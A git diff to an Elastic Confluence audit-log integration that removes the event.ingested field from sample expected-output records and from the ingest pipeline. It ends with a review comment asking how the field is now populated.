@@ -3630,7 +3591,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347883057Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":493000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3726,7 +3686,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347883766Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":496000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3816,7 +3775,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347884554Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":498000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3912,7 +3870,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347885273Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":501000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4008,7 +3965,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347885993Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":503000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4098,7 +4054,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347886696Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":506000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4194,7 +4149,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347887407Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":508000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4290,7 +4244,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347888116Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":510000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4380,7 +4333,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347888900Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":513000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4476,7 +4428,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347889612Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":515000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4572,7 +4523,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347890335Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":518000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4662,7 +4612,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347891134Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":520000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4758,7 +4707,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347891855Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":522000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4854,7 +4802,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347892641Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":525000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4944,7 +4891,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347893361Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":527000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5040,7 +4986,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347894083Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":529000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5136,7 +5081,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347894792Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":532000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5191,7 +5135,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:47:21.347895497Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"-1\",\"name\":\"System\",\"type\":\"system\"},\"changedValues\":[{\"i18nKey\":\"atlassian.audit.event.change.retention\",\"key\":\"Retention\",\"to\":\"3 Years\"}],\"extraAttributes\":[],\"method\":\"System\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":615000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5278,7 +5221,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:47:21.347896285Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"57\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 57\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:43:22.615Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624653,\"nano\":873000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5360,7 +5302,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:47:21.347897Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:44:13.873Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 58\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-22T23:47:20.782708Z;\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"58\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624840,\"nano\":815000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -5433,7 +5374,6 @@ }, "event": { "action": "audit.logging.summary.global.settings.edited", - "ingested": "2021-12-24T00:47:21.347897716Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Global settings changed\",\"actionI18nKey\":\"audit.logging.summary.global.settings.edited\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global Administration\",\"categoryI18nKey\":\"audit.logging.category.admin\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Custom contact admin message\",\"key\":\"Custom contact admin message\",\"to\":\"Please enter information about your request for the site administrators. If you are reporting an error please be sure you include information on what you were doing and the time the problem occurred.\"},{\"from\":\"Confluence\",\"i18nKey\":\"Site title\",\"key\":\"Site title\",\"to\":\"Confluence Test\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624990,\"nano\":382000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5531,7 +5471,6 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-24T00:47:21.347898426Z", "original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"Another User\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"Another User\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"another.user@example.como\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"another.user\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":842000000},\"version\":\"1.0\"}", "type": [ "user", 
@@ -5621,7 +5560,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347899141Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":966000000},\"version\":\"1.0\"}", "type": [ "group", @@ -5710,7 +5648,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347899946Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625032,\"nano\":205000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -5805,7 +5742,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:47:21.347900660Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"63\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 63\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:50:32.205Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625035,\"nano\":770000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" diff --git a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 2d64b9a828b..80aa4d2989d 100644 --- a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for processing sample logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' 
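Review bot: With the `set` processor for `event.ingested` dropped from the top of `processors:` in the Confluence `default.yml`, nothing in the visible part of this pipeline stamps ingest time any more, so the field now depends on something outside this file (presumably the Fleet final pipeline, which is not shown here). Audit data like this is commonly read by detection rules and ingest-lag checks keyed on `event.ingested`, so it is worth confirming that the package's minimum stack version in its manifest guarantees the field is still populated, and recording the removal in the package changelog rather than only the ECS bump. A one-line comment above the remaining `ecs.version` processor, e.g. `# event.ingested is no longer set here; it is expected to be added downstream of this pipeline`, would stop a later maintainer from re-adding it or assuming it was lost by accident. The `processors:` list continues outside the hunk, so any later step that reads `event.ingested` could not be checked from here.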
